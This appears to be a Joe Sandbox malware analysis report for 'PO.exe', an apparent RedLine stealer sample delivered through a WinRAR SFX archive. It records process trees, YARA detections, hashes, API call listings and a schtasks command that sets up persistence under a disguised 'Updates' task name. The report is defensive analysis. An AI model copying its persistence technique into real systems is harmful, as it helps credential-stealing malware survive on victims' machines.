Commandline:	"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Imagebase:	0x250000
File size:	550'920 bytes
MD5 hash:	8A9837F38BD2C2ADDA21106E3B75FFA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	13:57:05
Start date:	16/07/2024
Path:	C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
Imagebase:	0xe30000
File size:	550'920 bytes
MD5 hash:	8A9837F38BD2C2ADDA21106E3B75FFA8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 0000000F.00000002.2262603009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	13:57:05
Start date:	16/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	13:57:07
Start date:	16/07/2024
Path:	C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
Imagebase:	0x660000
File size:	550'920 bytes
MD5 hash:	8A9837F38BD2C2ADDA21106E3B75FFA8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000011.00000002.2241712167.0000000003A26000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 83%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	13:57:07
Start date:	16/07/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff6ef0c0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	20
Start time:	13:57:14
Start date:	16/07/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\QntRsaVyLKlY" /XML "C:\Users\user\AppData\Local\Temp\tmpDEBA.tmp"
Imagebase:	0xf90000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	13:57:14
Start date:	16/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	13:57:14
Start date:	16/07/2024
Path:	C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\QntRsaVyLKlY.exe"
Imagebase:	0xc60000
File size:	550'920 bytes
MD5 hash:	8A9837F38BD2C2ADDA21106E3B75FFA8
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	13:57:14
Start date:	16/07/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.7%
Total number of Nodes:	2000
Total number of Limit Nodes:	36

Executed Functions

Function 00C80F8F Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 199
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C75EDC: GetModuleHandleW.KERNEL32 ref: 00C75EF4
Part of subcall function 00C75EDC: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C75F0C
Part of subcall function 00C75EDC: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C75F2F

Part of subcall function 00C7DAC4: GetCurrentDirectoryW.KERNEL32(?,?), ref: 00C7DACC

Part of subcall function 00C7DF6C: OleInitialize.OLE32(00000000), ref: 00C7DF85
Part of subcall function 00C7DF6C: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00C7DFBC
Part of subcall function 00C7DF6C: SHGetMalloc.SHELL32(00CB86E0), ref: 00C7DFC6

Part of subcall function 00C76BC0: GetCPInfo.KERNEL32(00000000,?), ref: 00C76BD1
Part of subcall function 00C76BC0: IsDBCSLeadByte.KERNEL32(00000000), ref: 00C76BE5

GetCommandLineW.KERNEL32 ref: 00C80FD7
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 00C80FFE
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 00C8100F
UnmapViewOfFile.KERNEL32(00000000), ref: 00C81049

Part of subcall function 00C80CA3: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 00C80CB9
Part of subcall function 00C80CA3: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 00C80CF5

CloseHandle.KERNEL32(00000000), ref: 00C81052
GetModuleFileNameW.KERNEL32(00000000,00CCDF58,00000800), ref: 00C8106D
SetEnvironmentVariableW.KERNEL32(sfxname,00CCDF58), ref: 00C8107F
GetLocalTime.KERNEL32(?), ref: 00C81086
_swprintf.LIBCMT ref: 00C810C5
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 00C810D7
GetModuleHandleW.KERNEL32(00000000), ref: 00C810DA
LoadIconW.USER32(00000000,00000064), ref: 00C810F1
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0000EA13,00000000), ref: 00C81142
Sleep.KERNELBASE(?), ref: 00C81170
DeleteObject.GDI32 ref: 00C811AF
DeleteObject.GDI32(?), ref: 00C811BB

Part of subcall function 00C7F798: CharUpperW.USER32(?,?,?,?,00001000), ref: 00C7F7F0
Part of subcall function 00C7F798: CharUpperW.USER32(?,?,?,?,?,00001000), ref: 00C7F817

CloseHandle.KERNEL32 ref: 00C811FA

Strings

winrarsfxmappingfile.tmp, xrefs: 00C80FF2
C:\Users\user\Desktop, xrefs: 00C80FA4
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 00C810B6
STARTDLG, xrefs: 00C81137
sfxname, xrefs: 00C8107A
sfxstime, xrefs: 00C810D2

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCharCloseDeleteObjectProcUpperView$ByteCommandCurrentDialogDirectoryGdiplusIconInfoInitializeLeadLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 985665271-2656992072
Opcode ID: ea45249d88d196b6b0943264d4f8ae2755d2e687ab71dc5690b9646c32a90f08
Instruction ID: 81702b4468e4943055be197ad416bb721fa1f837f0ff8dd3c14bdb7b23add116
Opcode Fuzzy Hash: ea45249d88d196b6b0943264d4f8ae2755d2e687ab71dc5690b9646c32a90f08
Instruction Fuzzy Hash: F561F171500240ABD720BBB1EC8AF2F3BECEB48709F08452EFA45A31A1DB748949D765

Function 00C7DB06 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 92
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(00000066,PNG,?,?,00C7E98C,00000066), ref: 00C7DB17
SizeofResource.KERNEL32(00000000,75FD5780,?,?,00C7E98C,00000066), ref: 00C7DB2F
LoadResource.KERNEL32(00000000,?,?,00C7E98C,00000066), ref: 00C7DB42
LockResource.KERNEL32(00000000,?,?,00C7E98C,00000066), ref: 00C7DB4D
GlobalAlloc.KERNEL32(00000002,00000000,00000000,?,?,?,00C7E98C,00000066), ref: 00C7DB6B
GlobalLock.KERNEL32(00000000,?,?,?,00C7E98C,00000066), ref: 00C7DB78
GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 00C7DBD3
GlobalUnlock.KERNEL32(00000000), ref: 00C7DBE8
GlobalFree.KERNEL32(00000000), ref: 00C7DBEF

Strings

PNG, xrefs: 00C7DB08

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: GlobalResource$Lock$AllocBitmapCreateFindFreeFromGdipLoadSizeofUnlock
String ID: PNG
API String ID: 4097654274-364855578
Opcode ID: e6da1ff9d5ce37f67b726353ba613ba838278dccac3305ce6539afd8d3698d87
Instruction ID: acc6703b455ab6abfda90d59b564e50c6a2e8cc0297f2342dbca8e5ff9225cc8
Opcode Fuzzy Hash: e6da1ff9d5ce37f67b726353ba613ba838278dccac3305ce6539afd8d3698d87
Instruction Fuzzy Hash: D8215C71604702ABC7229F21DC8DF2F7FBCEF45794F158529F95A82260DB21D804DBA1

Function 00C773EA Relevance: 16.8, APIs: 3, Strings: 6, Instructions: 1087COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00C773F3
__allrem.LIBCMT ref: 00C77A1B
__allrem.LIBCMT ref: 00C77A97

Strings

zx01, xrefs: 00C77865
zipx, xrefs: 00C77928
AES-0017, xrefs: 00C777A2
PO.exe, xrefs: 00C77509, 00C775E3, 00C775EE, 00C775FA, 00C775FB, 00C776AC, 00C77741, 00C777A7, 00C777E6, 00C777FE, 00C77C95, 00C77CB9, 00C77CBE, 00C77D06, 00C77D4C, 00C77D56, 00C77D64, 00C77D65, 00C77DDF, 00C77DF8, 00C77E02, 00C77E3B, 00C77E40, 00C77E41, 00C77E69, 00C77E75, 00C77EA6, 00C77ED5, 00C77EF1, 00C77F01, 00C77F15, 00C77F1E, 00C77F28, 00C77F44, 00C77F51, 00C77F56, 00C77FA3, 00C7803A, 00C78089
zip, xrefs: 00C7792F, 00C77939
z01, xrefs: 00C7786C, 00C77876

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: __allrem$H_prolog
String ID: AES-0017$PO.exe$z01$zip$zipx$zx01
API String ID: 1819648897-3515524225
Opcode ID: 11f329e0bbae895b3ebc531fe8df1f5b1f6fc6146eb798ef68b9e6d2c0d3e904
Instruction ID: 4653d8d2ad50c68d37329a2ba37a11e6bca9d7d3232feb7dfe180cfd2deb506c
Opcode Fuzzy Hash: 11f329e0bbae895b3ebc531fe8df1f5b1f6fc6146eb798ef68b9e6d2c0d3e904
Instruction Fuzzy Hash: 4C82BD71648209AFDB24DF64DC95BAD37A8FB48304F088369FD19972A2DB309E44EB51

Function 00C7286D Relevance: 7.6, APIs: 5, Instructions: 108
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00C72768,000000FF,?,?), ref: 00C728A2
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00C72768,000000FF,?,?), ref: 00C728D8
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C72768,000000FF,?,?), ref: 00C728E0
FindNextFileW.KERNEL32(?,?,?,?,?,?,00C72768,000000FF,?,?), ref: 00C72908
GetLastError.KERNEL32(?,?,?,?,00C72768,000000FF,?,?), ref: 00C72914

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 07f80f89902ab124e4ce07108be4518088ac22a83d6316c4b325235358545392
Instruction ID: f2463819b40231032d47b4cd915bf685e8342590089821f3626bb5dffab35c28
Opcode Fuzzy Hash: 07f80f89902ab124e4ce07108be4518088ac22a83d6316c4b325235358545392
Instruction Fuzzy Hash: 88416276604745AFC325EF28C884ADAF7E8BF48350F048A1AF5EDD3240D735A9549B92

Function 00C897B3 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,00C89789,?,00C9C7E0,0000000C,00C898E0,?,00000002,00000000), ref: 00C897D4
TerminateProcess.KERNEL32(00000000,?,00C89789,?,00C9C7E0,0000000C,00C898E0,?,00000002,00000000), ref: 00C897DB
ExitProcess.KERNEL32 ref: 00C897ED

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: afb226c309ed5716f031c103579abca322be769b98f9453a004393f5e7583801
Instruction ID: 9aa8c947e548766e4dd9ec8814ee88a41e9a726f06a41cad754c051db4d11d2e
Opcode Fuzzy Hash: afb226c309ed5716f031c103579abca322be769b98f9453a004393f5e7583801
Instruction Fuzzy Hash: D3E0B631110908AFCF127F64DD4EB9C3B69EF41B45F540015F8199A121CB36DD92DB94

Function 00C79660 Relevance: 1.6, Strings: 1, Instructions: 354COMMON

Download Yara Rule

Strings

c, xrefs: 00C7997E

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID:
String ID: c
API String ID: 0-112844655
Opcode ID: cb4b50fe8f27baf8ff3018e6d6b137e90a8b8395b0e35ce05709abd0bd06d736
Instruction ID: 01f9f3a65e269f6320fce58826bc936c79aad344b310d00484c1b1ef22439c71
Opcode Fuzzy Hash: cb4b50fe8f27baf8ff3018e6d6b137e90a8b8395b0e35ce05709abd0bd06d736
Instruction Fuzzy Hash: 2BE15771A083858FC728DF28D480A6ABBE1FBC9718F10892DE59A87351D731E946CF52

Function 00C7EA13 Relevance: 98.7, APIs: 47, Strings: 9, Instructions: 724COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00C7EA18

Part of subcall function 00C71180: GetDlgItem.USER32(00000000,00003021), ref: 00C711C4
Part of subcall function 00C71180: SetWindowTextW.USER32(00000000,00C95294), ref: 00C711DA

Strings

winrarsfxmappingfile.tmp, xrefs: 00C7EDE7
LICENSEDLG, xrefs: 00C7F298
-el -s2 "-d%s" "-sp%s", xrefs: 00C7EDAC
C:\Users\user\Desktop, xrefs: 00C7EE0A
"%s"%s, xrefs: 00C7EF4E
__tmp_rar_sfx_access_check_%u, xrefs: 00C7ECF2
STARTDLG, xrefs: 00C7EA37
@, xrefs: 00C7EDD2
<, xrefs: 00C7EDC5

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: H_prologItemTextWindow
String ID: "%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
API String ID: 810644672-3472986185
Opcode ID: e5b0664215c3a377323e0aeb746abe12eb57d917b5703050db049055258c7011
Instruction ID: b8966657ddb45425f13014691dec2ae1b1540c290bff4b1e3155313fb1fe1136
Opcode Fuzzy Hash: e5b0664215c3a377323e0aeb746abe12eb57d917b5703050db049055258c7011
Instruction Fuzzy Hash: 92420771940344BFEB21AF64DC8AFBF3B6CAB05704F1481A9F619A60E1CB744E49DB61

Function 00C75EDC Relevance: 51.1, APIs: 22, Strings: 7, Instructions: 314
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 00C75EF4
GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 00C75F0C
GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 00C75F2F
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C761DA
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00C761F2
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00C76204
ReadFile.KERNEL32(00000000,?,00007FFE,00C954C8,00000000), ref: 00C76223
CloseHandle.KERNEL32(00000000), ref: 00C7627B
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 00C76291
CompareStringW.KERNEL32(00000400,00001001,00C95514,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 00C762EB
GetFileAttributesW.KERNELBASE(?,?,00C954E0,00000800,?,00000000,?,00000800), ref: 00C76314
GetFileAttributesW.KERNEL32(?,?,00C955A0,00000800), ref: 00C7634D

Part of subcall function 00C75E92: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C75EAD
Part of subcall function 00C75E92: LoadLibraryW.KERNELBASE(?,?,00C74C54,Crypt32.dll,?,00C74CD6,?,00C74CBA,?,?,?,?), ref: 00C75ECF

_swprintf.LIBCMT ref: 00C763BD
_swprintf.LIBCMT ref: 00C76409

Part of subcall function 00C736D0: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C736E3

AllocConsole.KERNEL32 ref: 00C76411
GetCurrentProcessId.KERNEL32 ref: 00C7641B
AttachConsole.KERNEL32(00000000), ref: 00C76422
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 00C76448
WriteConsoleW.KERNEL32(00000000), ref: 00C7644F
Sleep.KERNEL32(00002710), ref: 00C7645A
FreeConsole.KERNEL32 ref: 00C76460
ExitProcess.KERNEL32 ref: 00C76468

Strings

DXGIDebug.dll, xrefs: 00C75F6C, 00C762D7
SetDllDirectoryW, xrefs: 00C75F06
dwmapi.dll, xrefs: 00C75F97, 00C76380
SetDefaultDllDirectories, xrefs: 00C75F29
uxtheme.dll, xrefs: 00C7638A
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 00C763F7
kernel32, xrefs: 00C75EEA

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: de79763ace13a5f6bfa697af8ecd9abc63a56b7dfa2fdcf86e4a0c57a4c296ad
Instruction ID: c69c68500d0e07a2613241fa8d4420a284de8bd9a81ff8a77c8a4dcdd58fe6c0
Opcode Fuzzy Hash: de79763ace13a5f6bfa697af8ecd9abc63a56b7dfa2fdcf86e4a0c57a4c296ad
Instruction Fuzzy Hash: 4CD172F1548B809FDF32DF60C84DB9FBBE8AB84704F50491DF1899A291C7B08649DB66

Function 00C73D4B Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00C73702: _wcschr.LIBVCRUNTIME ref: 00C73731

GetWindowRect.USER32(?,?), ref: 00C73D82
GetClientRect.USER32(?,?), ref: 00C73D8E
GetWindowLongW.USER32(?,000000F0), ref: 00C73E2F
GetWindowRect.USER32(?,?), ref: 00C73E5C
GetWindowTextW.USER32(?,?,00000400), ref: 00C73E7B
SetWindowTextW.USER32(?,?), ref: 00C73EA2
GetSystemMetrics.USER32(00000008), ref: 00C73EAA
GetWindow.USER32(?,00000005), ref: 00C73EB5
GetWindowTextW.USER32(00000000,?,00000400), ref: 00C73EE0
SetWindowTextW.USER32(00000000,00000000), ref: 00C73F0D
GetWindowRect.USER32(00000000,?), ref: 00C73F20
GetWindow.USER32(00000000,00000002), ref: 00C73F92

Strings

d, xrefs: 00C73DAE

Memory Dump Source

Source File: 00000000.00000002.2173991176.0000000000C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C70000, based on PE: true

Associated: 00000000.00000002.2173963726.0000000000C70000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174023851.0000000000C95000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000C9F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174047131.0000000000CD1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174124353.0000000000CD2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_c70000_owKQ0b029a.jbxd

Similarity

API ID: Window$RectText$ClientLongMetricsSystem_wcschr
String ID: d
API String ID: 4134264131-2564639436
Opcode ID: db1d8480a6e9677689213555f56e0006a0f6ae4236825986c9f4dc9c12a5b9c7
Instruction ID: c0635b4a8222d0c51751fbce6d7675fe8e236090c4087662271300623cdec9cc
Opcode Fuzzy Hash: db1d8480a6e9677689213555f56e0006a0f6ae4236825986c9f4dc9c12a5b9c7
Instruction Fuzzy Hash: DD618CB2108341AFD310DB69DD89F6FBBE9FBC9314F05492EF585D2290C674EA058B52

Function 00C805D4 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 96
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(00000068,00CCEF80), ref: 00C805E3
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,00C7E199,00000001,?,?,00C7EA02,00C96160,00CCEF80), ref: 00C8060E
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 00C8061D
SendMessageW.USER32(00000000,000000C2,00000000,00C95294), ref: 00C80627
